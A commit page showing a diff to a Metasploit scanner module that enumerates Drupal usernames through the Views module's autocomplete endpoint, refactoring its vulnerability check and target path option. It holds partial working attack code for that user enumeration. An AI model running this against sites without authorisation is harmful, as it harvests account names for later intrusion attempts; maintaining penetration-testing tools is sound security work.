Land #3990, @wchen-r7's fix for #3984, a busted check in drupal_views…

…_user_enum
rapid7 · Oct 13, 2014 · d51d2bf · d51d2bf
2 parents 458da2b + 260aa8d
commit d51d2bf
Showing 1 changed file with 13 additions and 19 deletions.
diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -35,43 +35,37 @@ module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'
 
     register_options(
       [
-        OptString.new('PATH', [true, "Drupal Path", "/"])
+        OptString.new('TARGETURI', [true, "Drupal Path", "/"])
       ], self.class)
   end
 
-  def check(base_uri)
+  def base_uri
+    @base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
+  end
+
+  def check_host(ip)
     res = send_request_cgi({
       'uri'     => base_uri,
       'method'  => 'GET',
       'headers' => { 'Connection' => 'Close' }
     }, 25)
 
     if not res
-      return false
+      return Exploit::CheckCode::Unknown
     elsif res and res.body =~ /\<title\>Access denied/
       # This probably means the Views Module actually isn't installed
-      print_error("#{rhost} - Access denied")
-      return false
+      vprint_error("#{rhost} - Access denied")
+      return Exploit::CheckCode::Safe
     elsif res and res.message != 'OK' or res.body != '[  ]'
-      return false
+      return Exploit::CheckCode::Safe
     else
-      return true
+      return Exploit::CheckCode::Appears
     end
   end
 
   def run_host(ip)
-    # Make sure the URIPATH begins with '/'
-    datastore['PATH'] = normalize_uri(datastore['PATH'])
-
-    # Make sure the URIPATH ends with /
-    if datastore['PATH'][-1,1] != '/'
-      datastore['PATH'] = datastore['PATH'] + '/'
-    end
-
-    enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
-
     # Check if remote host is available or appears vulnerable
-    if not check(enum_uri)
+    unless check_host(ip) == Exploit::CheckCode::Appears
       print_error("#{ip} does not appear to be vulnerable, will not continue")
       return
     end
@@ -83,7 +77,7 @@ def run_host(ip)
       vprint_status("Iterating on letter: #{l}")
 
       res = send_request_cgi({
-        'uri'     => enum_uri+l,
+        'uri'     => base_uri+l,
         'method'  => 'GET',
         'headers' => { 'Connection' => 'Close' }
       }, 25)